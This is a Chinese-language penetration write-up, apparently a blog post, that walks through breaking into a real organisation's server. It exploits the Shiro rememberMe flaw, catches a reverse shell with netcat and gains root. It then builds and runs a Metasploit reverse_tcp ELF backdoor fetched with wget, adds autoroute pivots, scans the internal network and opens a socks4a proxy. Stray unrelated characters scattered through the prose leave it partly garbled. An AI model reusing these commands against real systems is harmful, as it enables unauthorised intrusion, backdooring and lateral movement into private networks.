打進內網以后的過程沒有繼續(xù)深入搞锹引,具體原因大家懂的冶伞,
前期打點系任,開始的想法是爆破個弱口令的恳蹲,弱口令爆破一圈沒有找到有用的賬戶,
返回包存在 :Set-Cookie: rememberMe=deleteMe; 參數俩滥, 測試一下 shiro漏洞嘉蕾,萬一沒修復就撿到了,美滋滋
成功打到DNSLOG 返回信息
得到log霜旧,確定漏洞是存在的错忱,腳本寫入linux反彈shell的命令,
vps 開啟NC 監(jiān)聽? nc -lvp 777 成功返回
獲得服務器權限 root 挂据,開始通過dnslog 知道服務器是通外網的以清,利用msf 生成? elf 后門
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > 123.elf
把生成好的后門放在遠程HTTP服務上面,
在shell里崎逃,wget 遠程下載
成功下載以后掷倔,chmod 給后門權限 777 就行,-rwxrwxrwx 1 root root
msf 運行命令? use exploit/multi/handler?? 獲得shell反彈地址
set?payload linux/x64/meterpreter/reverse_tcp
地址填寫VPS? 端口寫后門端口就好了个绍,直接run
查看內網路由勒葱,添加路由命令
run get_local_subnets //獲取路由地址
run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
run autoroute -p //查看添加的路由
run autorouute -d //刪除添加的路由
內網掃描端口? use auxiliary/scanner/portscan/tcp?
利用msf socks4a模塊代理
use auxiliary/server/socks4a?
set SRVHOST IP
set SRVPORT 端口
運行返回信息:
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
本地利用代理連接 代理的服務器 設置好端口 ,瀏覽器訪問
某會議系統(tǒng)
